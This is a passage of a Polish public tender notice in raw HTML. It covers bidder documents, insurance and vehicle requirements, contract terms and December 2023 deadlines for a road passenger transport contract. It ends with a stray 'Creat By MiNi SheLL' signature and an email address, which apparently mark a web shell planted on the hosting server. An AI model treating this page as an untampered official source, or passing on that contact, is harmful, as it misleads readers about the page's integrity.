złożenia oferty na innym formularzu niż załącznik nr 1 do SWZ, <br/>powinien on zawierać wszystkie wymagane informacje określone w tym załączniku. <br/>Formularz oferty nie podlega uzupełnieniu.<br/>2) wymagane oświadczenia i dokumenty, wskazane w rozdziale XXVI - WYKAZ <br/>PODMIOTOWYCH ŚRODKÓW DOWODOWYCH.<br/>Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu <br/>warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego <br/>w rozdziale XXIV – INFORMACJA O WARUNKACH UDZIAŁU W POSTĘPOWANIU <br/>O UDZIELENIE ZAMÓWIENIA i rozdziale XXV - PODSTAWY WYKLUCZENIA (wzór <br/>oświadczenia określa załącznik nr 2 do SWZ).<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie <br/>warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane <br/>przez zamawiającego podmiotowe środki dowodowe wskazane w rozdziale XXVI ust. 7.<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci <br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub <br/>podpisem osobistym.<br/>Do oferty wykonawca załącza również:<br/>1) Pełnomocnictwo:<br/>Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, <br/>który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument <br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty <br/>i podpisania umowy<br/>oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez zamawiającego (na podstawie § 2 ust. 1 pkt 7 oraz <br/>§ 3 rozporządzenia (wzór oświadczenia określa załącznik nr 10 do SWZ),<br/>4) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności do tej <br/>samej grupy kapitałowej (wzór oświadczenia określa załącznik nr 3 do SWZ), jeżeli <br/>do postępowania przystąpi dwóch lub więcej wykonawców,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu <br/>warunków udziału w postępowaniu w zakresie wskazanym przez zamawiającego <br/>w rozdziale XXIV – INFORMACJA O WARUNKACH UDZIAŁU W POSTĘPOWANIU <br/>O UDZIELENIE ZAMÓWIENIA i rozdziale XXV - PODSTAWY WYKLUCZENIA (wzór <br/>oświadczenia określa załącznik nr 2 do SWZ).<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie <br/>warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane <br/>przez zamawiającego podmiotowe środki dowodowe wskazane w rozdziale XXVI ust. 7.<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci <br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub <br/>podpisem osobistym.<br/>dokumenty potwierdzające posiadanie aktualnych uprawnień do wykonywania krajowego <br/>transportu drogowego osób, wydanych na podstawie ustawy z dnia 6 września 2001 r. <br/>o transporcie drogowym (Dz. U. z 2022 r. poz. 2201 ze zm.),<br/>3) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę <br/>gwarancyjną określoną przez zamawiającego (co najmniej 4 000 000,00 zł),<br/>5) wykaz usług (zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ), wykonanych <br/>nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, <br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są <br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, <br/>a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie <br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych <br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być <br/>wystawione w okresie ostatnich 3 miesięcy.<br/>W przypadku składania oferty wspólnej wykonawcy składają zgodnie z wyborem jeden wspólny <br/>wykaz lub oddzielne wykazy. Warunek zostanie uznany za spełniony, jeśli wykonawcy <br/>składający ofertę wspólną będą spełniać go łącznie.<br/>6) wykaz osób (zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ) skierowanych przez <br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych <br/>za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji <br/>zawodowych, uprawnień niezbędnych do wykonywania zamówienia publicznego, a także <br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami. <br/>W przypadku składania oferty wspólnej wykonawcy składają zgodnie z wyborem jeden wspólny <br/>wykaz lub oddzielne wykazy. Warunek zostanie uznany za spełniony, jeśli wykonawcy <br/>składający ofertę wspólną będą spełniać go łącznie,<br/>7) wykaz pojazdów (zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ) dostępnych <br/>wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do <br/>dysponowania tymi zasobami. Do wykazu należy dołączyć kopie, potwierdzone za zgodność <br/>z oryginałem, dowodów rejestracyjnych pojazdów mających realizować zamówienie publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje dot. składania ofert przez Wykonawców wspólnie ubiegających się o udzielnie zamówienia znajdują się w SWZ.<br/>2) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia <br/>warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, <br/>które usługi wykonają poszczególni wykonawcy.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych <br/>z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej <br/>sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi <br/>wykonają poszczególni wykonawcy.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej <br/>opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym <br/>osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną <br/>w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>W przypadku gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej <br/>i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu <br/>opatrzone kwalifikowanym podpisem elektronicznym, a w przypadku postępowań lub konkursów, <br/>o wartości mniejszej niż progi unijne, kwalifikowanym podpisem elektronicznym, podpisem zaufanym <br/>lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w <br/>postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, dokonuje <br/>odpowiednio wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia lub <br/>notariusz. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowe informacje dot. rodzaju, zakresu zmian umowy znajdują się w dokumentacji SWZ<br/>Rozdział XXXIV. PROJEKTOWANE POSTANOWIENIA UMOWY W SPRAWIE ZAMÓWIENIA <br/>PUBLICZNEGO, KTÓRE ZOSTANĄ WPROWADZONE DO UMOWY W SPRAWIE ZAMÓWIENIA <br/>PUBLICZNEGO<br/>Projektowane postanowienia umowy stanowią załącznik nr 7 do SWZ. Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy.<br/><br/>§ 10 i § 11 projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://banie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszystkie szczegółowe informacje zawarte są w Specyfikacji Warunków Zamówienia (SWZ) oraz załącznikach do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com